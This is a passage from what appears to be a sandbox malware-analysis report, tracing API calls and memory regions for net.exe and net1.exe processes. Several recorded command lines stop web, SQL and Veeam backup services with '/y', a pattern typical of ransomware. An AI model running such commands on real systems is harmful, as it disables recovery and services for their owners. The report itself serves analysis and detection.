0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12682 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12683 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 12684 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 12685 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12686 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12687 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12688 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12689 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12690 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12691 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12692 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12693 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12694 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12695 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12696 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12697 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12698 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12699 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12700 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12722 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 898 os_tid = 0x7cc [0119.825] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afdd0 | out: lpSystemTimeAsFileTime=0x1afdd0*(dwLowDateTime=0xfc8c3e70, dwHighDateTime=0x1d48689)) [0119.825] GetCurrentProcessId () returned 0xad4 [0119.825] GetCurrentThreadId () returned 0x7cc [0119.825] GetTickCount () returned 0x279b1 [0119.825] QueryPerformanceCounter (in: lpPerformanceCount=0x1afdd8 | out: lpPerformanceCount=0x1afdd8*=1816674300000) returned 1 [0119.826] GetModuleHandleW (lpModuleName=0x0) returned 0xff880000 [0119.826] __set_app_type (_Type=0x1) [0119.826] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff899c9c) returned 0x0 [0119.826] __getmainargs (in: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788, _DoWildCard=0, _StartInfo=0xff8a479c | out: _Argc=0xff8a4780, _Argv=0xff8a4790, _Env=0xff8a4788) returned 0 [0119.826] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.826] GetConsoleOutputCP () returned 0x1b5 [0119.826] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff8acec0 | out: lpCPInfo=0xff8acec0) returned 1 [0119.826] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0119.828] sprintf_s (in: _DstBuf=0x1afd78, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0119.828] setlocale (category=0, locale=".437") returned="English_United States.437" [0119.829] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0119.829] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0119.830] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop W3Svc /y" [0119.830] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1afb10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0119.830] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0119.830] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afd68 | out: Buffer=0x1afd68*=0x3a4d40) returned 0x0 [0119.830] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afd68 | out: Buffer=0x1afd68*=0x3ac0e0) returned 0x0 [0119.830] _fileno (_File=0x7fefdba2a80) returned 0 [0119.830] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0119.830] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0119.830] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0119.830] _wcsicmp (_String1="config", _String2="stop") returned -16 [0119.830] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0119.830] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0119.830] _wcsicmp (_String1="file", _String2="stop") returned -13 [0119.830] _wcsicmp (_String1="files", _String2="stop") returned -13 [0119.830] _wcsicmp (_String1="group", _String2="stop") returned -12 [0119.830] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0119.830] _wcsicmp (_String1="help", _String2="stop") returned -11 [0119.830] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0119.830] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0119.830] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0119.830] _wcsicmp (_String1="session", _String2="stop") returned -15 [0119.830] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0119.830] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0119.830] _wcsicmp (_String1="share", _String2="stop") returned -12 [0119.830] _wcsicmp (_String1="start", _String2="stop") returned -14 [0119.830] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0119.830] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0119.830] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0119.831] _wcsicmp (_String1="accounts", _String2="W3Svc") returned -22 [0119.831] _wcsicmp (_String1="computer", _String2="W3Svc") returned -20 [0119.831] _wcsicmp (_String1="config", _String2="W3Svc") returned -20 [0119.831] _wcsicmp (_String1="continue", _String2="W3Svc") returned -20 [0119.831] _wcsicmp (_String1="cont", _String2="W3Svc") returned -20 [0119.831] _wcsicmp (_String1="file", _String2="W3Svc") returned -17 [0119.831] _wcsicmp (_String1="files", _String2="W3Svc") returned -17 [0119.831] _wcsicmp (_String1="group", _String2="W3Svc") returned -16 [0119.831] _wcsicmp (_String1="groups", _String2="W3Svc") returned -16 [0119.831] _wcsicmp (_String1="help", _String2="W3Svc") returned -15 [0119.831] _wcsicmp (_String1="helpmsg", _String2="W3Svc") returned -15 [0119.831] _wcsicmp (_String1="localgroup", _String2="W3Svc") returned -11 [0119.831] _wcsicmp (_String1="pause", _String2="W3Svc") returned -7 [0119.831] _wcsicmp (_String1="session", _String2="W3Svc") returned -4 [0119.831] _wcsicmp (_String1="sessions", _String2="W3Svc") returned -4 [0119.831] _wcsicmp (_String1="sess", _String2="W3Svc") returned -4 [0119.831] _wcsicmp (_String1="share", _String2="W3Svc") returned -4 [0119.831] _wcsicmp (_String1="start", _String2="W3Svc") returned -4 [0119.831] _wcsicmp (_String1="stats", _String2="W3Svc") returned -4 [0119.831] _wcsicmp (_String1="statistics", _String2="W3Svc") returned -4 [0119.831] _wcsicmp (_String1="stop", _String2="W3Svc") returned -4 [0119.831] _wcsicmp (_String1="time", _String2="W3Svc") returned -3 [0119.831] _wcsicmp (_String1="user", _String2="W3Svc") returned -2 [0119.831] _wcsicmp (_String1="users", _String2="W3Svc") returned -2 [0119.831] _wcsicmp (_String1="msg", _String2="W3Svc") returned -10 [0119.831] _wcsicmp (_String1="messenger", _String2="W3Svc") returned -10 [0119.831] _wcsicmp (_String1="receiver", _String2="W3Svc") returned -5 [0119.831] _wcsicmp (_String1="rcv", _String2="W3Svc") returned -5 [0119.831] _wcsicmp (_String1="netpopup", _String2="W3Svc") returned -9 [0119.831] _wcsicmp (_String1="redirector", _String2="W3Svc") returned -5 [0119.831] _wcsicmp (_String1="redir", _String2="W3Svc") returned -5 [0119.831] _wcsicmp (_String1="rdr", _String2="W3Svc") returned -5 [0119.831] _wcsicmp (_String1="workstation", _String2="W3Svc") returned 60 [0119.831] _wcsicmp (_String1="work", _String2="W3Svc") returned 60 [0119.831] _wcsicmp (_String1="wksta", _String2="W3Svc") returned 56 [0119.831] _wcsicmp (_String1="prdr", _String2="W3Svc") returned -7 [0119.831] _wcsicmp (_String1="devrdr", _String2="W3Svc") returned -19 [0119.831] _wcsicmp (_String1="lanmanworkstation", _String2="W3Svc") returned -11 [0119.831] _wcsicmp (_String1="server", _String2="W3Svc") returned -4 [0119.831] _wcsicmp (_String1="svr", _String2="W3Svc") returned -4 [0119.831] _wcsicmp (_String1="srv", _String2="W3Svc") returned -4 [0119.831] _wcsicmp (_String1="lanmanserver", _String2="W3Svc") returned -11 [0119.831] _wcsicmp (_String1="alerter", _String2="W3Svc") returned -22 [0119.831] _wcsicmp (_String1="netlogon", _String2="W3Svc") returned -9 [0119.832] _wcsupr (in: _String="W3Svc" | out: _String="W3SVC") returned="W3SVC" [0119.832] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3ac900 [0119.892] GetServiceKeyNameW (in: hSCManager=0x3ac900, lpDisplayName="W3SVC", lpServiceName=0xff8a5750, lpcchBuffer=0x1afc88 | out: lpServiceName="", lpcchBuffer=0x1afc88) returned 0 [0119.893] _wcsicmp (_String1="msg", _String2="W3SVC") returned -10 [0119.893] _wcsicmp (_String1="messenger", _String2="W3SVC") returned -10 [0119.893] _wcsicmp (_String1="receiver", _String2="W3SVC") returned -5 [0119.893] _wcsicmp (_String1="rcv", _String2="W3SVC") returned -5 [0119.893] _wcsicmp (_String1="redirector", _String2="W3SVC") returned -5 [0119.893] _wcsicmp (_String1="redir", _String2="W3SVC") returned -5 [0119.893] _wcsicmp (_String1="rdr", _String2="W3SVC") returned -5 [0119.893] _wcsicmp (_String1="workstation", _String2="W3SVC") returned 60 [0119.893] _wcsicmp (_String1="work", _String2="W3SVC") returned 60 [0119.893] _wcsicmp (_String1="wksta", _String2="W3SVC") returned 56 [0119.893] _wcsicmp (_String1="prdr", _String2="W3SVC") returned -7 [0119.893] _wcsicmp (_String1="devrdr", _String2="W3SVC") returned -19 [0119.893] _wcsicmp (_String1="lanmanworkstation", _String2="W3SVC") returned -11 [0119.893] _wcsicmp (_String1="server", _String2="W3SVC") returned -4 [0119.893] _wcsicmp (_String1="svr", _String2="W3SVC") returned -4 [0119.893] _wcsicmp (_String1="srv", _String2="W3SVC") returned -4 [0119.893] _wcsicmp (_String1="lanmanserver", _String2="W3SVC") returned -11 [0119.893] _wcsicmp (_String1="alerter", _String2="W3SVC") returned -22 [0119.893] _wcsicmp (_String1="netlogon", _String2="W3SVC") returned -9 [0119.893] NetServiceControl (in: servername=0x0, service="W3SVC", opcode=0x0, arg=0x0, bufptr=0x1afc90 | out: bufptr=0x1afc90) returned 0x889 [0119.894] wcscpy_s (in: _Destination=0xff8a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0119.894] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0119.895] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0119.896] GetFileType (hFile=0xb) returned 0x2 [0119.896] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afb58 | out: lpMode=0x1afb58) returned 1 [0119.897] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1afb50, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x1afb50*=0x1e) returned 1 [0119.897] GetFileType (hFile=0xb) returned 0x2 [0119.897] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afb58 | out: lpMode=0x1afb58) returned 1 [0119.897] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afb50, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x1afb50*=0x2) returned 1 [0119.897] _ultow (in: _Dest=0x889, _Radix=1768384 | out: _Dest=0x889) returned="2185" [0119.897] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff8a5b50, nSize=0x800, Arguments=0xff8a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0119.898] GetFileType (hFile=0xb) returned 0x2 [0119.898] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afb58 | out: lpMode=0x1afb58) returned 1 [0119.898] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff8a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1afb50, lpReserved=0x0 | out: lpBuffer=0xff8a5b50*, lpNumberOfCharsWritten=0x1afb50*=0x34) returned 1 [0119.898] GetFileType (hFile=0xb) returned 0x2 [0119.898] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1afb58 | out: lpMode=0x1afb58) returned 1 [0119.898] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff881efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1afb50, lpReserved=0x0 | out: lpBuffer=0xff881efc*, lpNumberOfCharsWritten=0x1afb50*=0x2) returned 1 [0119.899] NetApiBufferFree (Buffer=0x3a4d40) returned 0x0 [0119.899] NetApiBufferFree (Buffer=0x3ac0e0) returned 0x0 [0119.899] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop W3Svc /y" [0119.899] exit (_Code=2) Process: id = "361" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x7842b000" os_pid = "0xb4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLAgent$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12701 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12702 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12703 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12704 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12705 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12706 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12707 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12708 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12709 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12710 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12711 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 12712 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 12713 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12714 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12715 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 12716 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12717 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12718 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12719 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 899 os_tid = 0x504 Process: id = "362" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x2b71e000" os_pid = "0x708" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "356" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\net1 stop WRSVC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12723 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12724 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12725 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12726 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12727 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12728 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12729 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12730 start_va = 0xff880000 end_va = 0xff8b2fff entry_point = 0xff880000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12731 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12732 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12733 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 12734 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12735 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12736 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12737 start_va = 0x450000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 12738 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12739 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12740 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12741 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12819 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12820 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 12821 start_va = 0xd0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 12822 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12823 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12824 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12825 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12826 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12827 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12828 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12829 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12830 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12831 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12832 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12833 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12834 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12835 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12836 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12837 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12838 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 901 os_tid = 0xa68 [0120.302] GetSystemTimeAsFileTime 